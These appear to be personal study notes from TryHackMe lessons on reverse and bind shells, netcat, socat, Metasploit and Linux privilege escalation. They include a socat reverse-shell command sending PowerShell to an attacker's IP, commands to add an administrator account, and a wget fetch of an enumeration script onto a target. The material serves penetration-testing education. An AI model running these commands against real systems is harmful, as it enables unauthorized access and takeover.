# What the Shell?


shells are what we use when interfacing with a Command Line environment (CLI). In other words, the common bash or sh programs in Linux are examples of shells, as are cmd.exe and Powershell on Windows.

  

- <mark style="background: #FFF3A3A6;">Reverse shells</mark> are when the target is forced to execute code that connects back to your computer. On your own computer you would use one of the tools mentioned in the previous task to set up a listener which would be used to receive the connection. Reverse shells are a good way to bypass firewall rules that may prevent you from connecting to arbitrary ports on the target; however, the drawback is that, when receiving a shell from a machine across the internet, you would need to configure your own network to accept the shell. This, however, will not be a problem on the TryHackMe network due to the method by which we connect into the network.
- <mark style="background: #FFF3A3A6;">Bind shells</mark> are when the code executed on the target is used to start a listener attached to a shell directly on the target. This would then be opened up to the internet, meaning you can connect to the port that the code has opened and obtain remote code execution that way. This has the advantage of not requiring any configuration on your own network, but may be prevented by firewalls protecting the target.


  
Netcat:

  

Netcat is used to manually perform all kinds of network interactions, including things like banner grabbing during enumeration, but more importantly for our uses, it can be used to receive reverse shells and connect to remote ports attached to bind shells on a target system. Netcat shells are very unstable (easy to lose) by default.

  

The syntax for starting a netcat listener using Linux is this:

  

Reverse Shells

nc -lvnp {port-number}

  

- -l is used to tell netcat that this will be a listener
- -v is used to request a verbose output
- -n tells netcat not to resolve host names or use DNS.
-  -p indicates that the port specification will follow.

it's often a good idea to use a well-known port number (80, 443 or 53 being good choices) as this is more likely to get past outbound firewall rules on the target.

  

Bind Shells

  

nc {TARGET-IP} {CHOSEN-PORT}

  

Netcat Shell Stabilization

- Python
- Rlwrap - windows
- use an initial netcat shell as a stepping stone into a more fully-featured socat shell.

  

With any of the above techniques, it's useful to be able to change your terminal tty size. First, open another terminal and run stty -a. Note down the values for "rows" and columns. Fill in the numbers you got from running the command in your own terminal.

  

Socat:

  

Socat is like netcat on steroids. It can do all of the same things, and many more. Socat shells are usually more stable than netcat shells out of the box. In this sense it is vastly superior to netcat; however, there are two big catches:

  

- The syntax is more difficult
    
- Netcat is installed on virtually every Linux distribution by default. Socat is very rarely installed by default.
    

  

One of the many great things about socat is that it's capable of creating encrypted shells -- both bind and reverse. Encrypted shells cannot be spied on unless you have the decryption key, and are often able to bypass an IDS as a result.

  

Reverse Shell

Local machine: socat TCP-L:{PORT} 

Windows machine: socat TCP:{LOCAL-IP}:{LOCAL-PORT} EXEC:powershell.exe,pipes

Metasploit -- multi/handler:

  

The exploit/multi/handler module of the Metasploit framework is, like socat and netcat, used to receive reverse shells. Due to being part of the Metasploit framework, multi/handler provides a fully-fledged way to obtain stable shells, with a wide variety of further options to improve the caught shell. It's also the only way to interact with a meterpreter shell,

  

Msfvenom:

  

Like multi/handler, msfvenom is technically part of the Metasploit Framework, however, it is shipped as a standalone tool.

  

msfvenom -p {PAYLOAD} {OPTIONS}

  

Shell_reverse_tcp indicates that it was a stageless payload. How? Stageless payloads are denoted with underscores (_). The staged equivalent to this payload would be:

shell/reverse_tcp As staged payloads are denoted with another forward slash (/)

  

Multi/Handler is a superb tool for catching reverse shells. It's essential if you want to use Meterpreter shells, and is the go-to when using staged payloads.

- exploit -j  tells Metasploit to launch the module, running as a job in the background.
- use sessions to foreground it again

  


 ------------------------------------------------------------------------------------------------------------

  

Interactive and non-interactive shells

  

The output of an interactive command does go somewhere, however, figuring out where is an exercise for you to attempt on your own. Suffice to say that interactive programs do not work in non-interactive shells.

  

Ok, we have a shell. Now what?

  

On Linux ideally we would be looking for opportunities to gain access to a user account. SSH keys stored at /home/{USER}/.ssh are often an ideal way to do this. In CTFs it's also not infrequent to find credentials lying around somewhere on the box.

  

On Windows the options are often more limited. It's sometimes possible to find passwords for running services in the registry. Ideally on Windows you would obtain a shell running as the SYSTEM user, or an administrator account running with high privileges. In such a situation it's possible to simply add your own account (in the administrators group) to the machine, then log in over RDP, telnet, winexe, psexec, WinRM or any number of other methods, depending on the services running on the box. The syntax for this is as follows:

  

net user {username} {password} /add

  

net localgroup administrators {username} /add

# Common Linux Privesc

At it's core, Privilege Escalation usually involves going from a lower permission to a higher permission. More technically, it's the exploitation of a vulnerability, design flaw or configuration oversight in an operating system or application to gain unauthorized access to resources that are usually restricted from the users.

Horizontal privilege escalation: This is where you expand your reach over the compromised system by taking over a different user who is on the same privilege level as you. 

Vertical privilege escalation (privilege elevation): This is where you attempt to gain higher privileges or access, with an existing account that you have already compromised. 

LinEnum is a simple bash script that performs common commands related to privilege escalation.  It is important to understand what commands LinEnum executes, so that you are able to manually enumerate privesc vulnerabilities in a situation where you're unable to use LinEnum or other like scripts. It's worth keeping this somewhere you'll remember, because LinEnum is an invaluable tool.

How do I get LinEnum on the target machine?

  

- There are two ways to get LinEnum on the target machine. The first way, is to go to the directory that you have your local copy of LinEnum stored in, and start a Python web server using "python3 -m http.server 8000" [1]. Then using "wget" on the target machine, and your local IP, you can grab the file from your local machine [2]. Then make the file executable using the command "chmod +x FILENAME.sh".
    

  

The first step in Linux privilege escalation exploitation is to check for files with the SUID (Set User ID)/GUID (Group User ID) bit set. This means that the file or files can be run with the permissions of the file(s) owner/group.

  

The maximum number of bit that can be used to set permission for each user is 7, which is a combination of read (4) write (2) and execute (1) operation. For example, if you set permissions using "chmod" as 755, then it will be: rwxr-xr-x.

  

to search the file system for SUID/GUID manually we can use the command: "find / -perm -u=s -type f 2>/dev/null" 

  

Understanding /etc/passwd

  

The /etc/passwd file stores essential information, which  is required during login. In other words, it stores user account information. The /etc/passwd is a plain text file. It contains a list of the system’s accounts, giving for each account some useful information like user ID, group ID, home directory, shell, and more.

  

/etc/passwd format

  

 test:x:0:0:root:/root:/bin/bash

  

1. Username
2. Password: An x character indicates that encrypted password is stored in /etc/shadow file
3. User ID (UID): Each user must be assigned a user ID (UID). UID 0 (zero) is reserved for root and UIDs 1-99 are reserved for other predefined accounts. Further UID 100-999 are reserved by system for administrative and system accounts/groups.
4. Group ID (GID): The primary group ID (stored in /etc/group file)
5. User ID Info: The comment field.
6. Home directory: The absolute path to the directory the user will be in when they log in
7. Command/shell: The absolute path of a command or shell (/bin/bash). Typically, this is a shell. Please note that it does not have to be a shell.


<span style="color:rgb(255, 0, 0)"> Every time you have access to an account during a CTF scenario, you should use "sudo -l" to list what commands you're able to use as a superuser on that account</span>

  

Always check crontabs manually

  

Below is a list of good checklists to apply to CTF or penetration test use cases

# Linux PrivEsc

Bin directories in Linux are dedicated areas for storing executable files, commonly known as binaries.**